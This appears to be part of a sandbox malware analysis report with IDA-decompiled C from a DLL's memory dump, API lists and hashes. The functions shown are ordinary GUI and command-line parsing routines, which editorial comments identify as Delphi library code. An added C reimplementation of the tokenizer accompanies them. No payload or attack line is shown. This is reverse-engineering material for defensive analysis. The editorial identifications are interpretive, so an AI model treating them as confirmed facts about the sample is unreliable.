                          • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                          • API String ID: 1416857345-3736581797
                          • Opcode ID: a7ac863787773003a616a3565d413d44b876fd07bbca9d9d22dc4d3bb4f74d32
                          • Instruction ID: 16886c732bd1a778d2bef8a7b27e11d1a44821aa99486246e53592af4b9aa9e7
                          • Opcode Fuzzy Hash: a7ac863787773003a616a3565d413d44b876fd07bbca9d9d22dc4d3bb4f74d32
                          • Instruction Fuzzy Hash: 48112EF8340306EFE7109F64C8A5B6AB7E9FF45750F204625F8449B2C0D7B89C608B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 57%
                          			E0072B68C(void* __eax, void* __ecx, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				struct HDC__* _v12;
                          				struct tagRECT _v28;
                          				struct tagRECT _v44;
                          				char _v56;
                          				char _v72;
                          				signed char _t43;
                          				struct HDC__* _t55;
                          				void* _t74;
                          				signed int _t77;
                          				int _t78;
                          				int _t79;
                          				void* _t92;
                          				intOrPtr _t105;
                          				void* _t114;
                          				void* _t117;
                          				void* _t120;
                          				void* _t122;
                          				intOrPtr _t123;
                          
                          				_t120 = _t122;
                          				_t123 = _t122 + 0xffffffbc;
                          				_t92 = __ecx;
                          				_v8 = __edx;
                          				_t114 = __eax;
                          				_t43 = GetWindowLongA(E0074CFE0(_v8), 0xffffffec);
                          				if((_t43 & 0x00000002) == 0) {
                          					return _t43;
                          				} else {
                          					GetWindowRect(E0074CFE0(_v8),  &_v44);
                          					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
                          					_t55 = E0074CFE0(_v8);
                          					_push(_t55);
                          					L007069E0();
                          					_v12 = _t55;
                          					_push(_t120);
                          					_push(0x72b7e7);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t123;
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					asm("movsd");
                          					_t117 = _t114;
                          					if(_t92 != 0) {
                          						_t77 = GetWindowLongA(E0074CFE0(_v8), 0xfffffff0);
                          						if((_t77 & 0x00100000) != 0 && (_t77 & 0x00200000) != 0) {
                          							_t78 = GetSystemMetrics(2);
                          							_t79 = GetSystemMetrics(3);
                          							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
                          							L00715C48(_v28.right - _t78, _v28.right, _v28.bottom - _t79,  &_v72, _v28.bottom);
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t117 = _t117;
                          							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
                          						}
                          					}
                          					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
                          					E0072B2C4( &_v56, 2);
                          					E0072B218(_t117,  &_v56, _v12, 0,  &_v44);
                          					_pop(_t105);
                          					 *[fs:eax] = _t105;
                          					_push(0x72b7ee);
                          					_push(_v12);
                          					_t74 = E0074CFE0(_v8);
                          					_push(_t74);
                          					L00706B28();
                          					return _t74;
                          				}
                          			}

                          0x0072b68d
                          0x0072b68f
                          0x0072b695
                          0x0072b697
                          0x0072b69a
                          0x0072b6a7
                          0x0072b6af
                          0x0072b7f4
                          0x0072b6b5
                          0x0072b6c2
                          0x0072b6d7
                          0x0072b6df
                          0x0072b6e4
                          0x0072b6e5
                          0x0072b6ea
                          0x0072b6ef
                          0x0072b6f0
                          0x0072b6f5
                          0x0072b6f8
                          0x0072b702
                          0x0072b703
                          0x0072b704
                          0x0072b705
                          0x0072b706
                          0x0072b709
                          0x0072b716
                          0x0072b720
                          0x0072b72b
                          0x0072b734
                          0x0072b743
                          0x0072b75d
                          0x0072b769
                          0x0072b76a
                          0x0072b76b
                          0x0072b76c
                          0x0072b76d
                          0x0072b77e
                          0x0072b77e
                          0x0072b720
                          0x0072b7a3
                          0x0072b7af
                          0x0072b7c2
                          0x0072b7c9
                          0x0072b7cc
                          0x0072b7cf
                          0x0072b7d7
                          0x0072b7db
                          0x0072b7e0
                          0x0072b7e1
                          0x0072b7e6
                          0x0072b7e6

                          APIs
                          • GetWindowLongA.USER32 ref: 0072B6A7
                          • GetWindowRect.USER32 ref: 0072B6C2
                          • OffsetRect.USER32(?,?,?), ref: 0072B6D7
                          • 7378B080.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B6E5
                          • GetWindowLongA.USER32 ref: 0072B716
                          • GetSystemMetrics.USER32 ref: 0072B72B
                          • GetSystemMetrics.USER32 ref: 0072B734
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0072B743
                          • GetSysColorBrush.USER32(0000000F), ref: 0072B770
                          • FillRect.USER32 ref: 0072B77E
                          • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0072B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B7A3
                          • 7378B380.USER32(00000000,?,0072B7EE,?,?,00000000,0072B7E7,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0072B7E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Rect$Window$7378LongMetricsSystem$B080B380BrushClipColorExcludeFillInflateOffset
                          • String ID:
                          • API String ID: 3946395549-0
                          • Opcode ID: ab951692c4e47271a7e7dff8ffec303a32739a82c3cf94e65ade783e1b93ca5e
                          • Instruction ID: a77a210c5e1e5cb68174da2a588830cac1a37a1fd3f6b74672fbff0b612bd7db
                          • Opcode Fuzzy Hash: ab951692c4e47271a7e7dff8ffec303a32739a82c3cf94e65ade783e1b93ca5e
                          • Instruction Fuzzy Hash: 05411D72A04119EBCB01EAE8DD46EDFB7BDAF49310F144615F914F7281C738AE158760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 88%
                          			E0072751C(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
                          				struct tagPOINT _v12;
                          				int _v16;
                          				struct tagRECT _v32;
                          				struct tagRECT _v48;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t60;
                          				int _t61;
                          				RECT* _t64;
                          				struct HDC__* _t65;
                          
                          				_t64 = _a8;
                          				_t65 = _a4;
                          				if( *0x76f923 != 0) {
                          					_t61 = 0;
                          					if(_a12 == 0) {
                          						L14:
                          						return _t61;
                          					}
                          					_v32.left = 0;
                          					_v32.top = 0;
                          					_v32.right = GetSystemMetrics(0);
                          					_v32.bottom = GetSystemMetrics(1);
                          					if(_t65 == 0) {
                          						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							L13:
                          							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
                          						} else {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					}
                          					_v16 = GetClipBox(_t65,  &_v48);
                          					if(GetDCOrgEx(_t65,  &_v12) == 0) {
                          						goto L14;
                          					}
                          					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
                          					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
                          						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
                          							goto L13;
                          						}
                          						if(_v16 == 1) {
                          							_t61 = 1;
                          						}
                          						goto L14;
                          					} else {
                          						goto L13;
                          					}
                          				}
                          				 *0x76f910 = E00726F70(7, _t60,  *0x76f910, _t64, _t65);
                          				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
                          				goto L14;
                          			}

                          0x00727525
                          0x00727528
                          0x00727532
                          0x00727562
                          0x00727568
                          0x00727624
                          0x0072762c
                          0x0072762c
                          0x00727570
                          0x00727575
                          0x00727580
                          0x0072758b
                          0x00727590
                          0x007275f9
                          0x00727611
                          0x00727622
                          0x0072760d
                          0x0072760d
                          0x0072760d
                          0x00000000
                          0x007275f9
                          0x0072759c
                          0x007275ab
                          0x00000000
                          0x00000000
                          0x007275bd
                          0x007275d5
                          0x007275eb
                          0x00000000
                          0x00000000
                          0x007275f1
                          0x007275f3
                          0x007275f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x007275d5
                          0x00727546
                          0x0072755b
                          0x00000000

                          APIs
                          • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00727555
                          • GetSystemMetrics.USER32 ref: 0072757A
                          • GetSystemMetrics.USER32 ref: 00727585
                          • GetClipBox.GDI32(?,?), ref: 00727597
                          • GetDCOrgEx.GDI32(?,?), ref: 007275A4
                          • OffsetRect.USER32(?,?,?), ref: 007275BD
                          • IntersectRect.USER32 ref: 007275CE
                          • IntersectRect.USER32 ref: 007275E4
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                          • String ID: EnumDisplayMonitors
                          • API String ID: 362875416-2491903729
                          • Opcode ID: b94891c1a9cf6c11fb7c95852dbcf4ca2afa6fde25e07b7967a93dd1d7e7518b
                          • Instruction ID: b259b0d134c0708a76efe88f441bb5b4f785976ce16d3685accce406adf51cb0
                          • Opcode Fuzzy Hash: b94891c1a9cf6c11fb7c95852dbcf4ca2afa6fde25e07b7967a93dd1d7e7518b
                          • Instruction Fuzzy Hash: C7311EB2A05619AFDB15DFA8ED44AEFB7FCAB05300F008566F915E3240E778D911CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00702908(CHAR* __eax, intOrPtr* __edx) {
                          				char _t5;
                          				char _t6;
                          				CHAR* _t7;
                          				char _t9;
                          				CHAR* _t11;
                          				char _t14;
                          				CHAR* _t15;
                          				char _t17;
                          				CHAR* _t19;
                          				CHAR* _t22;
                          				CHAR* _t23;
                          				CHAR* _t32;
                          				intOrPtr _t33;
                          				intOrPtr* _t34;
                          				void* _t35;
                          				void* _t36;
                          
                          				_t34 = __edx;
                          				_t22 = __eax;
                          				while(1) {
                          					L2:
                          					_t5 =  *_t22;
                          					if(_t5 != 0 && _t5 <= 0x20) {
                          						_t22 = CharNextA(_t22);
                          					}
                          					L2:
                          					_t5 =  *_t22;
                          					if(_t5 != 0 && _t5 <= 0x20) {
                          						_t22 = CharNextA(_t22);
                          					}
                          					L4:
                          					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                          						_t36 = 0;
                          						_t32 = _t22;
                          						while(1) {
                          							_t6 =  *_t22;
                          							if(_t6 <= 0x20) {
                          								break;
                          							}
                          							if(_t6 != 0x22) {
                          								_t7 = CharNextA(_t22);
                          								_t36 = _t36 + _t7 - _t22;
                          								_t22 = _t7;
                          								continue;
                          							}
                          							_t22 = CharNextA(_t22);
                          							while(1) {
                          								_t9 =  *_t22;
                          								if(_t9 == 0 || _t9 == 0x22) {
                          									break;
                          								}
                          								_t11 = CharNextA(_t22);
                          								_t36 = _t36 + _t11 - _t22;
                          								_t22 = _t11;
                          							}
                          							if( *_t22 != 0) {
                          								_t22 = CharNextA(_t22);
                          							}
                          						}
                          						E007046B4(_t34, _t36);
                          						_t23 = _t32;
                          						_t33 =  *_t34;
                          						_t35 = 0;
                          						while(1) {
                          							_t14 =  *_t23;
                          							if(_t14 <= 0x20) {
                          								break;
                          							}
                          							if(_t14 != 0x22) {
                          								_t15 = CharNextA(_t23);
                          								if(_t15 <= _t23) {
                          									continue;
                          								} else {
                          									goto L27;
                          								}
                          								do {
                          									L27:
                          									 *((char*)(_t33 + _t35)) =  *_t23;
                          									_t23 =  &(_t23[1]);
                          									_t35 = _t35 + 1;
                          								} while (_t15 > _t23);
                          								continue;
                          							}
                          							_t23 = CharNextA(_t23);
                          							while(1) {
                          								_t17 =  *_t23;
                          								if(_t17 == 0 || _t17 == 0x22) {
                          									break;
                          								}
                          								_t19 = CharNextA(_t23);
                          								if(_t19 <= _t23) {
                          									continue;
                          								} else {
                          									goto L21;
                          								}
                          								do {
                          									L21:
                          									 *((char*)(_t33 + _t35)) =  *_t23;
                          									_t23 =  &(_t23[1]);
                          									_t35 = _t35 + 1;
                          								} while (_t19 > _t23);
                          							}
                          							if( *_t23 != 0) {
                          								_t23 = CharNextA(_t23);
                          							}
                          						}
                          						return _t23;
                          					} else {
						_t22 =  &(_t22[2]);     /* step over two characters and rescan for the token start (a "" pair in the Delphi GetParamStr routine this matches; editorial reading) */
						continue;
                          					}
                          				}
                          			}
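The listing above is the tail of a command-line tokenizer: 0x20 is ' ', 0x22 is '"', `CharNextA` steps over one (possibly multi-byte) character, and the routine first measures a token and then copies it into a freshly sized string (`E007046B4` sets the length). Its constants and control flow match `GetParamStr` from the Delphi run-time library, the routine behind `ParamStr` and `ParamCount`; that identification is an editorial reading, not a label from the report. It matters when reconstructing how the DLL sees the arguments it is launched with (for instance through rundll32), because the rules differ from `CommandLineToArgvW`: there is no backslash escaping, a quote may open mid-token, and a `""` pair ahead of a token is discarded, so an empty quoted argument does not occupy a `ParamStr` slot. What follows is an added example written for this page, not code from the sample or the report: a portable C re-implementation of those rules. It assumes single-byte characters (so `CharNextA(p)` becomes `p + 1`), copies in one pass into a caller-supplied buffer instead of the listing's count-then-copy passes, and adds `nth_param`/`param_count` helpers of my own so the tokenizer can be driven over a whole command line.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Append one character if it fits; the returned length always counts it, so a
   caller can detect truncation by comparing the result with the buffer size. */
static size_t put_char(char *out, size_t cap, size_t len, char c)
{
    if (len + 1 < cap)
        out[len] = c;
    return len + 1;
}

/* get_param_str: extract one token, mirroring the decompiled tokenizer above.
   Single-byte characters are assumed (CharNextA(p) == p + 1).
   Returns the position just past the token so the caller can loop. */
const char *get_param_str(const char *p, char *out, size_t cap)
{
    size_t len = 0;

    /* Skip anything <= ' ' and any "" pair in front of the token. An empty
       quoted argument therefore never produces a token of its own. */
    for (;;) {
        while (*p != '\0' && (unsigned char)*p <= ' ')
            p++;
        if (p[0] == '"' && p[1] == '"')
            p += 2;
        else
            break;
    }

    /* The token runs until the next character <= ' ' outside quotes. */
    while ((unsigned char)*p > ' ') {
        if (*p == '"') {
            p++;                                      /* opening quote dropped */
            while (*p != '\0' && *p != '"')
                len = put_char(out, cap, len, *p++);  /* spaces are literal here */
            if (*p != '\0')
                p++;                                  /* closing quote dropped */
        } else {
            len = put_char(out, cap, len, *p++);
        }
    }
    if (cap > 0)
        out[len < cap ? len : cap - 1] = '\0';
    return p;
}

/* nth_param: fetch token number idx (0 = program name); 1 on success,
   0 when the command line has fewer tokens. Helper of mine, not RTL code. */
int nth_param(const char *cmdline, int idx, char *out, size_t cap)
{
    const char *p = cmdline;
    for (int i = 0; ; i++) {
        p = get_param_str(p, out, cap);
        if (cap == 0 || out[0] == '\0')
            return 0;
        if (i == idx)
            return 1;
    }
}

/* param_count: tokens after the program name, the way ParamCount counts them. */
int param_count(const char *cmdline)
{
    char buf[256];
    int n = 0;
    while (nth_param(cmdline, n + 1, buf, sizeof buf))
        n++;
    return n;
}

/* param_equals: convenience check; tokens over 255 bytes are truncated. */
int param_equals(const char *cmdline, int idx, const char *expected)
{
    char buf[256];
    return nth_param(cmdline, idx, buf, sizeof buf) && strcmp(buf, expected) == 0;
}

int main(void)
{
    /* constructed sample, not a command line captured from the sandbox run */
    const char *cmd = "\"C:\\Program Files\\demo app\\demo.exe\" --in \"a b\" \"\"--out c";
    char tok[256];
    for (int i = 0; nth_param(cmd, i, tok, sizeof tok); i++)
        printf("param %d: [%s]\n", i, tok);
    printf("ParamCount = %d\n", param_count(cmd));
    return 0;
}
```

On the sample command line in `main` the `""` ahead of `--out` is swallowed, so `ParamCount` is 4 rather than 5; an unterminated quote runs the token to the end of the line rather than failing, which is also what the listing does.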
Line addresses (one entry per line of the C-code above, in order; 0x00000000 marks a line with no instruction address):
0x0070290c 0x0070290e 0x0070291a 0x0070291a 0x0070291a 0x0070291e 0x00702918 0x00702918
0x0070291a 0x0070291a 0x0070291e 0x00702918 0x00702918 0x00702924 0x00702927 0x00702934
0x00702936 0x0070297d 0x0070297d 0x00702981 0x00000000 0x00000000 0x0070293c 0x00702970
0x00702979 0x0070297b 0x00000000 0x0070297b 0x00702944 0x00702956 0x00702956 0x0070295a
0x00000000 0x00000000 0x00702949 0x00702952 0x00702954 0x00702954 0x00702963 0x0070296b
0x0070296b 0x00702963 0x00702987 0x0070298c 0x0070298e 0x00702990 0x007029e5 0x007029e5
0x007029e9 0x00000000 0x00000000 0x00702996 0x007029d1 0x007029d8 0x00000000 0x00000000
0x00000000 0x00000000 0x007029da 0x007029da 0x007029dc 0x007029df 0x007029e0 0x007029e1
0x00000000 0x007029da 0x0070299e 0x007029b7 0x007029b7 0x007029bb 0x00000000 0x00000000
0x007029a3 0x007029aa 0x00000000 0x00000000 0x00000000 0x00000000 0x007029ac 0x007029ac
0x007029ae 0x007029b1 0x007029b2 0x007029b3 0x007029ac 0x007029c4 0x007029cc 0x007029cc
0x007029c4 0x007029f1 0x0070292f 0x0070292f 0x00000000 0x0070292f 0x00702927

                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: "$"
                          • API String ID: 3213498283-3758156766
                          • Opcode ID: a2b77ae3d682355ecca9e1fed75d41edc23b25bd3cfa69c5b620e9d4d0137245
                          • Instruction ID: fc506523e7695fb480c90f8ad7736763b26fe89b4baa32f5e282a7fad01b71e9
                          • Opcode Fuzzy Hash: a2b77ae3d682355ecca9e1fed75d41edc23b25bd3cfa69c5b620e9d4d0137245
                          • Instruction Fuzzy Hash: F421E147728380EADF312AB85CCC3696BC94B5B304FA813A5D5C2AA2CBD45C6C87D225
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
			/* Editorial reading, not a label from the report: the structure and constants match
			   TWinControl.PaintControls from the Delphi VCL, i.e. compiler run-time GUI code rather
			   than malware logic. Child controls at +0x198 are painted by sending them WM_PAINT (0xf)
			   inside a saved, clipped DC, with bit 0x80 of the +0x54 state word (csPaintCopy in that
			   source) propagated from parent to child around the call; child windows at +0x19c get a
			   3D frame in clBtnShadow (0xff000010) and clBtnHighlight (0xff000014), which L0071FA64
			   presumably converts to an RGB value for CreateSolidBrush. */
			E0074ADEC(void* __eax, void* __ecx, struct HDC__* __edx) {
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				void* _v68;
                          				int _v80;
                          				int _t79;
                          				void* _t134;
                          				int _t135;
                          				void* _t136;
                          				void* _t159;
                          				void* _t160;
                          				void* _t161;
                          				struct HDC__* _t162;
                          				intOrPtr* _t163;
                          
                          				_t163 =  &(_v44.bottom);
                          				_t134 = __ecx;
                          				_t162 = __edx;
                          				_t161 = __eax;
                          				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                          				}
                          				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                          				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                          					L17:
                          					_t79 =  *(_t161 + 0x19c);
                          					if(_t79 == 0) {
                          						L27:
                          						return _t79;
                          					}
                          					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                          					if(_t79 < 0) {
                          						goto L27;
                          					}
                          					_v44.right = _t79 + 1;
                          					_t159 = 0;
                          					do {
                          						_t79 = E0071707C( *(_t161 + 0x19c), _t159);
                          						_t135 = _t79;
                          						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(L0071FA64(0xff000010));     /* 0xff000010 = clBtnShadow (VCL system colour for COLOR_BTNSHADOW) */
                          							L00715C48( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                          							FrameRect(_t162,  &_v44, _v44);
                          							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(L0071FA64(0xff000014));     /* 0xff000014 = clBtnHighlight (VCL system colour for COLOR_BTNHIGHLIGHT) */
                          							L00715C48( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                          							FrameRect(_t162,  &_v60, _v60);
                          							_t79 = DeleteObject(_v68);
                          						}
                          						_t159 = _t159 + 1;
                          						_t75 =  &(_v44.right);
                          						 *_t75 = _v44.right - 1;
                          					} while ( *_t75 != 0);
                          					goto L27;
                          				}
                          				_t160 = 0;
                          				if(_t134 != 0) {
                          					_t160 = E007170D8(_t78, _t134);
                          					if(_t160 < 0) {
                          						_t160 = 0;
                          					}
                          				}
                          				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                          				if(_t160 <  *_t163) {
                          					do {
                          						_t136 = E0071707C( *((intOrPtr*)(_t161 + 0x198)), _t160);
                          						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                          							L00715C48( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                          							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                          								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                          									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                          								}
                          								_v60.top = SaveDC(_t162);
                          								E00745268(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                          								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								L00747A98(_t136, _t162, 0xf, 0);     /* 0xf = WM_PAINT: the child control paints itself into the clipped DC */
                          								RestoreDC(_t162, _v80);
                          								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                          							}
                          						}
                          						_t160 = _t160 + 1;
                          					} while (_t160 < _v60.top);
                          				}
                          			}
Line addresses (one entry per line of the C-code above, in order; 0x00000000 marks a line with no instruction address):
0x0074adf0 0x0074adf3 0x0074adf5 0x0074adf7 0x0074ae00 0x0074ae1e 0x0074ae1e 0x0074ae21
0x0074ae29 0x0074af0e 0x0074af0e 0x0074af16 0x0074b01b 0x0074b01b 0x0074b01b 0x0074af1f
0x0074af22 0x00000000 0x00000000 0x0074af29 0x0074af2d 0x0074af2f 0x0074af37 0x0074af3c
0x0074af45 0x0074af7f 0x0074afa2 0x0074afad 0x0074afb7 0x0074afcc 0x0074afef 0x0074affa
0x0074b004 0x0074b004 0x0074b009 0x0074b00a 0x0074b00a 0x0074b00a 0x00000000 0x0074af2f
0x0074ae2f 0x0074ae33 0x0074ae3c 0x0074ae40 0x0074ae42 0x0074ae42 0x0074ae40 0x0074ae4d
0x0074ae53 0x0074ae59 0x0074ae66 0x0074ae6c 0x0074ae9a 0x0074aeac 0x0074aeb2 0x0074aeb4
0x0074aeb4 0x0074aec0 0x0074aecc 0x0074aede 0x0074aeee 0x0074aef9 0x0074aefe 0x0074aefe
0x0074aeac 0x0074af04 0x0074af05 0x0074ae59

                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                          • String ID:
                          • API String ID: 375863564-0
                          • Opcode ID: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
                          • Instruction ID: a7a1f0fe97528f3fc158a89f806de0cceeace0803cde9f0657c434953f625968
                          • Opcode Fuzzy Hash: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
                          • Instruction Fuzzy Hash: C1514A71204344EBDB18EF68C8C9B6B77E8AF85304F044458FE998B296E739EC55CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
			/* Editorial reading, not a label from the report: matches TWinControl.UpdateBounds from
			   the Delphi VCL. The window handle lives at +0x180; the routine takes the window's screen
			   rectangle (or its restored position when the window is minimised), converts it to the
			   parent's client coordinates for child windows, and stores Left/Top/Width/Height at
			   +0x40..+0x4c before calling L00745F80 (UpdateAnchorRules in that source). Run-time
			   library code, not payload logic. */
			E0074D24C(void* __eax) {
                          				void* _v32;
                          				struct _WINDOWPLACEMENT _v60;
                          				struct tagPOINT _v68;
                          				intOrPtr _v72;
                          				struct HWND__* _t21;
                          				void* _t42;
                          				struct HWND__* _t44;
                          				struct tagPOINT* _t46;
                          
                          				_t46 =  &_v60;
                          				_t42 = __eax;
                          				_t21 =  *(__eax + 0x180);
				_push(_t21);
				L00706A50();     /* unresolved thunk called with the window handle; in the VCL source this is IsIconic(FHandle) (editorial reading, not a resolved import) */
                          				if(_t21 == 0) {
                          					GetWindowRect( *(__eax + 0x180), _t46);
                          				} else {
					_v60.length = 0x2c;     /* 0x2c = sizeof(WINDOWPLACEMENT) */
                          					GetWindowPlacement( *(__eax + 0x180),  &_v60);
					asm("movsd");     /* four movsd: copy the 16-byte rcNormalPosition RECT out of the WINDOWPLACEMENT */
					asm("movsd");
					asm("movsd");
					asm("movsd");
                          				}
				if((GetWindowLongA( *(_t42 + 0x180), 0xfffffff0) & 0x40000000) != 0) {     /* 0xfffffff0 = GWL_STYLE (-16), 0x40000000 = WS_CHILD */
					_t44 = GetWindowLongA( *(_t42 + 0x180), 0xfffffff8);     /* 0xfffffff8 = GWL_HWNDPARENT (-8) */
                          					if(_t44 != 0) {
                          						ScreenToClient(_t44, _t46);
                          						ScreenToClient(_t44,  &_v68);
                          					}
                          				}
                          				 *(_t42 + 0x40) = _t46->x;
                          				 *((intOrPtr*)(_t42 + 0x44)) = _v72;
                          				 *((intOrPtr*)(_t42 + 0x48)) = _v68.x - _t46->x;
                          				 *((intOrPtr*)(_t42 + 0x4c)) = _v68.y - _v72;
                          				return L00745F80(_t42);
                          			}
Line addresses (one entry per line of the C-code above, in order):
0x0074d24f 0x0074d252 0x0074d254 0x0074d25a 0x0074d25b 0x0074d262 0x0074d291 0x0074d264
0x0074d264 0x0074d278 0x0074d283 0x0074d284 0x0074d285 0x0074d286 0x0074d286 0x0074d2a9
0x0074d2b9 0x0074d2bd 0x0074d2c1 0x0074d2cc 0x0074d2cc 0x0074d2bd 0x0074d2d4 0x0074d2db
0x0074d2e5 0x0074d2f0 0x0074d300

                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Window$ClientLongScreen$PlacementRect
                          • String ID: ,
